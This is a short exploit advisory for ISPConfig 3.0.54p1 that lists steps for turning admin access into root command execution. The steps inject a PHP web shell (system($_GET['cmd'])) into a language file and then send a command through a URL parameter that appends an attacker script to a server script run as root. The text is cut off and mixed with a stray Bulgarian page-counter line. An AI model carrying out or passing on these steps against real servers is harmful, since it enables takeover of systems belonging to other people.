# Exploit Title: ISPConfig 3 authenticated admin Localroot vulnerability # Date: 7/25/14 # Exploit Author: mra # Vendor Homepage: http://wwwispconfig.org # Version: 3.0.54p1 # Tested on: ubuntu, centos # irc.criten.net #elite-chat While logged in as admin user: 1) add a shell user 2) under option set gid to ispconfig 3) log in as that user 4) edit /usr/local/ispconfig/interface/lib/lang/en.lng with system($_GET['cmd']); 5) browse to: http://server:8080/index.php?cmd=echo /tmp/script >>/usr/local/ispconfig/server/server.sh 6) create /tmp/script and put a command you wish to be executed as root.Брой прочитания на тази страница: 703
ISPConfig 3.0.54p1 – Authenticated Admin Local root Vulnerability